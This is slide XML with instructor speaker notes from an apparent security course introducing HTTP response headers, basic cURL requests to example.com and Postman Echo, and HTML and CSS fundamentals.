            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>response message body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, or simply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>response body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which contains the data that the client requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that servers use response headers for many important tasks, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which are values the client stores and sends back to the server on subsequent requests, so the server can use them to track information about the client (such as login status, the items in their cart, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Coordinating with the client about the type of data the response contains, and how it’s encoded. E.g., servers often compress data with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> before sending it to the client, and use the Content-Encoding header to provide a “heads up” as to how to decompress the data upon receipt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Share information about the server and operating system in use, as evidenced by the Server and X-Powered-By headers. This is common practice, but it’s best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to leak this information, as attackers can use it to detect vulnerabilities about the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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598677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254344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Explain that, next, you’ll demonstrate a common tool for sending HTTP requests from the command line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that anything that sends an HTTP request qualifies as a client—even if it's not a web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that, while browser are the most familiar ways to browse the web, security professionals often use command-line tools to test how servers will respond to different types of requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> is a command-line utility for sending HTTP requests. In security, it's used to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Test that web server security configurations are functional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Ensure that web servers don't leak sensitive data through HTTP responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Verify that servers only respond to certain request types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Search for vulnerabilities in the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Let students know that they'll frequently switch between using the browser and using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> when auditing and penetration testing web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> is installed by default on Linux and Mac, but not on Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - To avoid a complicated installation procedure, you'll use a small Docker container with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> pre-installed for the demo and exercise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Let Windows students know they can install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> for use in Git Bash by following these instructions on their own time: &lt;https://develop.zendesk.com/hc/en-us/articles/360001068567-Installing-and-using-cURL#install&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Open a terminal, and run: `docker run -it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cyberxsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/alpine-curl bash`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Explain that this launches a bash shell on an Alpine Linux machine called `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cyberxsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/alpine-curl`, which comes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that the simplest use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> simply fetches the HTML for a web page using a GET request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Run: `curl example.com`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Point out the HTML printed in the terminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that you can see the request/response text by adding the `v` flag, for "verbose".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Run: `curl -v example.com`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Point out the lines prefixed with `&gt;` at the top. These indicate request text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Point out the lines prefixed with `&lt;` below the request. These indicate response text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that you can see just response headers with the `I` flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Run: `curl -I example.com`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Finally, explain that you can explicitly set a request type and URL with the `--request` and `--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>` options.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Run: `curl --request GET --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> example.com`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Point out that this produces the same result as `curl example.com`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Let students know that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> contains a wealth of useful additional options, which they can read about using `curl --help`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</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234121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that, in the next exercise, students will use Postman Echo to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to send requests of different types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Interpret the contents of the responses they receive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Research HTTP verbs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Let students know that Postman Echo is a server that accepts HTTP requests of any type, and sends back the submitted data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Give an example with: `curl --request GET --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://postman-echo.com/get?first_parameter=first_value`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Point out that the value of `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>first_parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>` appears in the left of the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Explain that this unusual-looking response is _not_ HTML, but a type of data called JSON, which students will study in greater depth later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Emphasize that this emphasizes that servers can respond with data of any type, not just HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Slack out the instructions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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590438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Open and explain the solution in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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3258119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notes on SPAs vs traditional static sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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4119040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Remind students that many kinds of data are transferred over the web, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, the code used to define the structure and content of a web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSS Stylesheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which describe the appearance and layout of web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which allows us to create interactive pages that update dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rich Media</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, such as images, videos, and audio, which enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" strike="sngStrike" dirty="0"/>
              <a:t>cat videos and procrastination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> the distribution of arbitrary content over the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that you’ll discuss each in turn, starting with HTML.</a:t>
            </a:r>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353079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Explain that HTML is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, meaning that browsers interpret it in such a way that allows us to describe what content a web documents will contain, and where on the page it will live.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Point out that web pages contain text, such as the strings reading “Hi!” and “Feel free to hack your way in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>” in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Rendered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> image on the right.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Emphasize that HTML is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> text, but the special formatting characters used to write it—in particular, the angle brackets visible in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Raw HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> image on the left—cause the browser to interpret it differently than “normal” text, and display it according to special rendering rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Explain that the fact that, while it may seem obvious that browsers treat HTML differently from “normal” text, this is the source of major vulnerabilities, such as XSS, which we’ll study later.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0"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982116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Remind students that CSS describes the appearance of a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that the left image depicts a page with CSS styles. The image on the right depicts the same page with styles removed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that the font settings, background, and even the illusion of tilt in the left image are all due to CSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that the default rules browsers use to render raw HTML don't result in pretty pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- To demonstrate, open [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ins_Raw_HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/index.html](Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ins_Raw_HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/index.html) in the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Point out that some things have been "rendered", e.g., the large headings, but that the page doesn't look like those we're used to seeing.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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848060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Explain that CSS rules change the appearance of web pages by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>targeting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> elements using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>selectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>The most basic CSS rules are defined with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>tag name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, followed by curly braces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>CSS properties/rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, within the curly braces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Remind students that this re-styles every h3 element on the page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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73079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the web is so well-studied by security professionals because it represents most organizations largest attack surface.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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888969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Remind students that one can also define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>CSS classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, which allow us to apply the same styles to any element with the class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Explain that class rules are defined with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>dot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>), followed by the class name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Remind students that we can apply this to an HTML element by setting its `class` attribute equal to `subtitle`.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
